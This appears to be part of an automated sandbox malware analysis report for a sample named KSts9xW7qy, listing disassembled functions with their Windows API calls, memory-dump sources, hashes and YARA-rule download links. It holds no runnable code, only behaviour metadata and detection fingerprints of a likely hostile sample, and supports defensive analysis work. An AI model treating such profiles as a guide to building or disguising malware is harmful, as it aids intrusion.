                                                                        • Instruction ID: a0772e53db42f0505c0fc597e387bcd466cbe66253f927d80447aa1ffd485b6d
                                                                        • Opcode Fuzzy Hash: 015de3f7f9dc43c5f97561f15320a01e2bb75f2f29957719d80f47292f6b453a
                                                                        • Instruction Fuzzy Hash: 55616975A00248AFDB11DFA8CC81EEEB7B9EF09714F14415AFA05E73A2D770A942DB50
                                                                        Function 00EA94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00EA94FE
                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00EA9549
                                                                        • VariantInit.OLEAUT32(?), ref: 00EA955B
                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EA957B
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00EA95BE
                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EA95D2
                                                                        • VariantClear.OLEAUT32(?), ref: 00EA95E7
                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00EA95F4
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EA95FD
                                                                        • VariantClear.OLEAUT32(?), ref: 00EA960F
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EA961A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID:
                                                                        • API String ID: 2706829360-0
                                                                        • Opcode ID: 63082eb88b6e39a440b214b4d7df9171f5a4c886bd9fd5ae1ebf13bdb7ee01a5
                                                                        • Instruction ID: 666c69ddd0d221cabf2ead82c1be8a869040a2b1b98d9f81fda53629036c84d3
                                                                        • Opcode Fuzzy Hash: 63082eb88b6e39a440b214b4d7df9171f5a4c886bd9fd5ae1ebf13bdb7ee01a5
                                                                        • Instruction Fuzzy Hash: BB413D31D00219AFCB02EFA5DC849EEBFBAFF89354F108065E515B7251DB30AA45CBA0
                                                                        Function 00ECADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • CoInitialize.OLE32 ref: 00ECADF6
                                                                        • CoUninitialize.OLE32 ref: 00ECAE01
                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00EFD8FC,?), ref: 00ECAE61
                                                                        • IIDFromString.OLE32(?,?), ref: 00ECAED4
                                                                        • VariantInit.OLEAUT32(?), ref: 00ECAF6E
                                                                        • VariantClear.OLEAUT32(?), ref: 00ECAFCF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                        • API String ID: 834269672-1287834457
                                                                        • Opcode ID: 0b711684c9fd49716730e6648af29e8aa2400f3460f110c6028bc5e91922ea21
                                                                        • Instruction ID: 42b3aa57d3009c803e1f0be7a8acfcb7ab434795fdbae9379b52cf524fba732c
                                                                        • Opcode Fuzzy Hash: 0b711684c9fd49716730e6648af29e8aa2400f3460f110c6028bc5e91922ea21
                                                                        • Instruction Fuzzy Hash: 7B618C702083159FC710DF54D944FAABBE8AF88718F08542DF985AB291C771ED89CB93
                                                                        Function 00EC8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00EC8168
                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00EC81AD
                                                                        • gethostbyname.WSOCK32(?), ref: 00EC81B9
                                                                        • IcmpCreateFile.IPHLPAPI ref: 00EC81C7
                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EC8237
                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EC824D
                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EC82C2
                                                                        • WSACleanup.WSOCK32 ref: 00EC82C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                        • String ID: Ping
                                                                        • API String ID: 1028309954-2246546115
                                                                        • Opcode ID: 910bb80bdacf4478d3f6744282558966002611e472de442f84a35f660405fb96
                                                                        • Instruction ID: 0f7b0d8bb2b8cc5f6a15138e2844804de9280ea177a2cbe52d952c518e47116b
                                                                        • Opcode Fuzzy Hash: 910bb80bdacf4478d3f6744282558966002611e472de442f84a35f660405fb96
                                                                        • Instruction Fuzzy Hash: 0C5190316047009FD724AF64CF49F6ABBE5AF44314F04995EF999BB2A1DB31E806CB41
                                                                        Function 00EBE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00EBE396
                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EBE40C
                                                                        • GetLastError.KERNEL32 ref: 00EBE416
                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00EBE483
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                        • API String ID: 4194297153-14809454
                                                                        • Opcode ID: c00ee504da6033bbeecbad03042bfbb726dade4eb512d880e8a0eda13509b716
                                                                        • Instruction ID: 598189e5615ade92951fcba40ee50808bcd984508688a78b96a04f0a00e0d366
                                                                        • Opcode Fuzzy Hash: c00ee504da6033bbeecbad03042bfbb726dade4eb512d880e8a0eda13509b716
                                                                        • Instruction Fuzzy Hash: C5318035A002099FDB01EFA4D845AFEBBF5EF44304F149055E515BB391DA74DA01CB91
                                                                        Function 00EAB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EAB98C
                                                                        • GetDlgCtrlID.USER32 ref: 00EAB997
                                                                        • GetParent.USER32 ref: 00EAB9B3
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EAB9B6
                                                                        • GetDlgCtrlID.USER32(?), ref: 00EAB9BF
                                                                        • GetParent.USER32(?), ref: 00EAB9DB
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EAB9DE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1383977212-1403004172
                                                                        • Opcode ID: 98a5f708dd901cbd27dea15447a9817bfe92117cadc993502205a8b06e1c3022
                                                                        • Instruction ID: d7e887be7999251e0d763ec577d9f42444de093c5ea6b17e5ba8f1bec4277a6d
                                                                        • Opcode Fuzzy Hash: 98a5f708dd901cbd27dea15447a9817bfe92117cadc993502205a8b06e1c3022
                                                                        • Instruction Fuzzy Hash: EF21A4B4900104BFDB04ABA5CC85EFEBBB9EB8A310B104119F555FB292DB745819DB21
                                                                        Function 00EAB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EABA73
                                                                        • GetDlgCtrlID.USER32 ref: 00EABA7E
                                                                        • GetParent.USER32 ref: 00EABA9A
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EABA9D
                                                                        • GetDlgCtrlID.USER32(?), ref: 00EABAA6
                                                                        • GetParent.USER32(?), ref: 00EABAC2
                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EABAC5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 1383977212-1403004172
                                                                        • Opcode ID: 124c9dfc8d491a7441c5dd97c9b118b35e1f42ec36f405d7431d9ec77b57a599
                                                                        • Instruction ID: 189f5b3a65820d42bbd81b9522ec1e0beb14a5d46dbb3d91a8bc06f91798e652
                                                                        • Opcode Fuzzy Hash: 124c9dfc8d491a7441c5dd97c9b118b35e1f42ec36f405d7431d9ec77b57a599
                                                                        • Instruction Fuzzy Hash: 6D2195B4940104BFDB01ABA4CC85EFEBBB9EF4A304F105019F555FB192DB759919EB20
                                                                        Function 00EABAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32 ref: 00EABAE3
                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00EABAF8
                                                                        • _wcscmp.LIBCMT ref: 00EABB0A
                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EABB85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                        • API String ID: 1704125052-3381328864
                                                                        • Opcode ID: 972be91f7a0fd31e4b107f4a26af1665119490cc76743cf22e8b864f8fe16ee7
                                                                        • Instruction ID: abd7bc036d849dc562d7245c3b25cb665456c83fa43d5a13211413a86407a6f6
                                                                        • Opcode Fuzzy Hash: 972be91f7a0fd31e4b107f4a26af1665119490cc76743cf22e8b864f8fe16ee7
                                                                        • Instruction Fuzzy Hash: CF11067660C303FDFA206624EC07DA6379DDB2A324B201022F904F80D6FFA5B9919924
                                                                        Function 00ECB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 00ECB2D5
                                                                        • CoInitialize.OLE32(00000000), ref: 00ECB302
                                                                        • CoUninitialize.OLE32 ref: 00ECB30C
                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00ECB40C
                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00ECB539
                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00ECB56D
                                                                        • CoGetObject.OLE32(?,00000000,00EFD91C,?), ref: 00ECB590
                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00ECB5A3
                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00ECB623
                                                                        • VariantClear.OLEAUT32(00EFD91C), ref: 00ECB633
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2395222682-0
                                                                        • Opcode ID: fedbcb8c33a80f0d265e7838add32e742503c0d5b8753c445c720827b5df5c0f
                                                                        • Instruction ID: eca1b1ad8c59fcbebe3f1ca8098fa62c68fef798f4cede401b9f75932060d04f
                                                                        • Opcode Fuzzy Hash: fedbcb8c33a80f0d265e7838add32e742503c0d5b8753c445c720827b5df5c0f
                                                                        • Instruction Fuzzy Hash: 8FC12471608300AFC704DF68C985A6BBBE9FF89308F00595DF58AAB251DB71ED06CB52
                                                                        Function 00E9ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __lock.LIBCMT ref: 00E9ACC1
                                                                          • Part of subcall function 00E97CF4: __mtinitlocknum.LIBCMT ref: 00E97D06
                                                                          • Part of subcall function 00E97CF4: EnterCriticalSection.KERNEL32(00000000,?,00E97ADD,0000000D), ref: 00E97D1F
                                                                        • __calloc_crt.LIBCMT ref: 00E9ACD2
                                                                          • Part of subcall function 00E96986: __calloc_impl.LIBCMT ref: 00E96995
                                                                          • Part of subcall function 00E96986: Sleep.KERNEL32(00000000,000003BC,00E8F507,?,0000000E), ref: 00E969AC
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E9ACED
                                                                        • GetStartupInfoW.KERNEL32(?,00F26E28,00000064,00E95E91,00F26C70,00000014), ref: 00E9AD46
                                                                        • __calloc_crt.LIBCMT ref: 00E9AD91
                                                                        • GetFileType.KERNEL32(00000001), ref: 00E9ADD8
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00E9AE11
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 1426640281-0
                                                                        • Opcode ID: d45173c42f26eb4cfc47340ba5461c6653ea01dafb03c0b11cc09aed38f3039a
                                                                        • Instruction ID: f46a23d013c65460d075e4498607d3a645c330da6708b8bdf9cd972f0cce116d
                                                                        • Opcode Fuzzy Hash: d45173c42f26eb4cfc47340ba5461c6653ea01dafb03c0b11cc09aed38f3039a
                                                                        • Instruction Fuzzy Hash: 5A81E570A063558FDF14CF68C8805ADBBF1AF45328B28526ED4A6BB3D1D7349843CB96
                                                                        Function 00EB67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 00EB67FD
                                                                        • __swprintf.LIBCMT ref: 00EB680A
                                                                          • Part of subcall function 00E9172B: __woutput_l.LIBCMT ref: 00E91784
                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00EB6834
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00EB6840
                                                                        • LockResource.KERNEL32(00000000), ref: 00EB684D
                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00EB686D
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00EB687F
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00EB688E
                                                                        • LockResource.KERNEL32(?), ref: 00EB689A
                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00EB68F9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                        • String ID:
                                                                        • API String ID: 1433390588-0
                                                                        • Opcode ID: eb9e85dfde17a4aa46cd860568ea77e0884fdff12aa915ab79b5849d9d9725fb
                                                                        • Instruction ID: 5b270aa9ee1582d18d21e8f39e332098d82f7e1fb8372a65b2fa28fb0cfe137c
                                                                        • Opcode Fuzzy Hash: eb9e85dfde17a4aa46cd860568ea77e0884fdff12aa915ab79b5849d9d9725fb
                                                                        • Instruction Fuzzy Hash: DF3190B190421AAFEB159FA1ED45AFFBBA9FF48345F004425F902F2150E738D915DBA0
                                                                        Function 00EB4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EB4047
                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB405B
                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00EB4062
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB4071
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EB4083
                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB409C
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB40AE
                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB40F3
                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB4108
                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB4113
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                        • String ID:
                                                                        • API String ID: 2156557900-0
                                                                        • Opcode ID: 7800ac9877cceb61518a8f7bc496f012b68666a3d281e8cf74a6ec0a339dfaf8
                                                                        • Instruction ID: 489430321326c10bd0cc1cc9c9b08566c487f9ff225a76330d05dafa18c038fd
                                                                        • Opcode Fuzzy Hash: 7800ac9877cceb61518a8f7bc496f012b68666a3d281e8cf74a6ec0a339dfaf8
                                                                        • Instruction Fuzzy Hash: 1A31E1F1901208AFDB11DF19DC85BBA7BAAEB90365F119016F904F62D1CBB49D80CB61
                                                                        Function 00EEDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 00E8B496
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00E8B4A0
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00E8B4B5
                                                                        • GetStockObject.GDI32(00000005), ref: 00E8B4BD
                                                                        • GetClientRect.USER32(?), ref: 00EEDD63
                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00EEDD7A
                                                                        • GetWindowDC.USER32(?), ref: 00EEDD86
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00EEDD95
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00EEDDA7
                                                                        • GetSysColor.USER32(00000005), ref: 00EEDDC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 3430376129-0
                                                                        • Opcode ID: f13b7b28393f9131f0325bd697b1228c3cbb690bd8a89cf9e59aa3dc38f308cb
                                                                        • Instruction ID: 662ef05e74d20ad962d5ff73daecd3a90f768398cb2b3b1c1d6cbb126790cb4a
                                                                        • Opcode Fuzzy Hash: f13b7b28393f9131f0325bd697b1228c3cbb690bd8a89cf9e59aa3dc38f308cb
                                                                        • Instruction Fuzzy Hash: DF118E31504209EFDB216FA5EC09BF93F66EB85325F108221FA6AB50E1DB310945EF20
                                                                        Function 00EACB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnumChildWindows.USER32(?,00EACF50), ref: 00EACE90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumWindows
